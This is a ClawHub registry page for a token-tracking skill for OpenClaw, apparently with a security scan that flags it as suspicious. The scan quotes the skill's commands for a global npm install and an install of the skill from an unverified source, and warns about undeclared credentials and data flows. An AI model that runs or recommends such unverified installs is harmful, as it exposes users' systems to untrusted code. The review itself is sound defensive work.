ClawHub
Skill flagged — suspicious patterns detected

ClawHub Security flagged this skill as suspicious. Review the scan results before using.

Token Tracker Pro

v2.2.0

记录和追踪 OpenClaw 会话的 token 消耗,提供每日、每周和累计统计,并提出节省 token 的建议

0· 88·0 current·0 all-time
by@longziruo-max
MIT-0
Download zip
LicenseMIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan
VirusTotalVirusTotal
Benign
View report →
OpenClawOpenClaw
Suspicious
medium confidence
!
Purpose & Capability
The skill claims to track OpenClaw session token usage, but the metadata declares no required binaries, no credentials, and no config paths. Practical token tracking would normally need access to session logs, an API, or platform usage metrics (and corresponding credentials); those are not declared, so the declared requirements are insufficient for the stated purpose.
!
Instruction Scope
SKILL.md tells the user/agent to run commands like 'token-tracker' and to 'npm install -g clawhub' then 'clawhub install token-tracker-pro-2026'. It does not explain where token data is read from, which credentials (if any) are needed, or whether data is sent to external endpoints. The instructions therefore give broad, vague authority to install/run external tooling without specifying dataflows or required permissions.
!
Install Mechanism
Although the registry entry has no install spec, the SKILL.md directs users to install a global npm package ('clawhub') and then use it to install the skill. That implies downloading and executing third-party code from npm and an unknown source. npm global installs modify the system and can run arbitrary code — this is a moderate-to-high risk unless the package and install source are verified. No homepage or repository is provided to audit.
!
Credentials
No environment variables, credentials, or config paths are declared, but token-tracking functionality would typically require access to account/session metrics or API credentials. The absence of declared secrets is suspicious (either the skill is incomplete or it would silently request/require credentials during runtime).
Persistence & Privilege
The skill is not marked 'always' and does not request special platform privileges. However, the suggested 'npm install -g' is a global installation that writes to system directories and persists code on disk, which increases risk if the source is untrusted. The skill metadata does not describe any self-modifying or cross-skill configuration, which is good.
What to consider before installing
This skill's README asks you to install and run third-party CLI code but gives no source repository, no declared binaries, and no explanation of where token data comes from — that mismatch is suspicious. Before installing: (1) ask the publisher for a homepage or source repo and review the code; (2) verify what 'clawhub' is and whether it is a known/trusted package; (3) confirm what credentials or platform permissions the tool needs and where data is stored or sent; (4) prefer testing in a sandbox or isolated environment rather than doing a global npm install; (5) avoid granting secrets until you can audit the code and data flow. If the publisher cannot provide verifiable source or justification for the missing credentials/binaries, treat this skill as untrusted.

Like a lobster shell, security has layers — review code before you run it.

latestvk97d1wphe5ndd8xc0e8jytx6wd83ket9optimizationvk97d1wphe5ndd8xc0e8jytx6wd83ket9provk97d1wphe5ndd8xc0e8jytx6wd83ket9productivityvk97d1wphe5ndd8xc0e8jytx6wd83ket9tokenvk97d1wphe5ndd8xc0e8jytx6wd83ket9trackingvk97d1wphe5ndd8xc0e8jytx6wd83ket9

License

MIT-0
Free to use, modify, and redistribute. No attribution required.
Termshttps://spdx.org/licenses/MIT-0.html

Comments